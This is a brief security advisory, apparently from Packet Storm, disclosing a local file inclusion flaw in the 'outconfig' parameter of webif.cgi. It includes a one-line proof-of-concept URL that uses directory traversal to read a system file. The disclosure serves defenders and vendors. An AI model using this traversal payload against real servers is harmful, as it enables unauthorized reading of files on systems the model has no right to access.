Webif.cgi suffers from a local file inclusion vulnerability.
d547b0f34f12329ecdd8498cec0bf1512aebabcd06b980ebfceddc93406b6a97.:: WEBIF.CGI LOCALE FILE INCLUSION ::.
[#] AUTHOR: maiosyet
[#] CONTACT: maiosyet@mawk.org
[#] SITE: http://www.mawk.org
[#] ORIGINAL ADV:
http://www.mawk.org/mods.php?mods=Core&page=view&id=102
[#] SOFTWARE: Webif.cgi
http://www.ifnet.it/webif/
[#] DESCRIPTION:
Webif is the natural solution for librarianships who want visibility across
the web or would like to manage Intranet networks, the whole at a reasonable price.
[#] BUG:
Input passed to the "outconfig" parameter in webif.cgi is not properly verified.
This can be exploited to include arbitrary files from local resources.
[#] PoC:
http://www.site.org/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue
[#] Thanks:
Einyx; Anathema, Hidden, XVII, Shatsar, Kaisentlaia and all the mawkers; black_dhalya :*
Federico, Eveline (you know who you are).
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed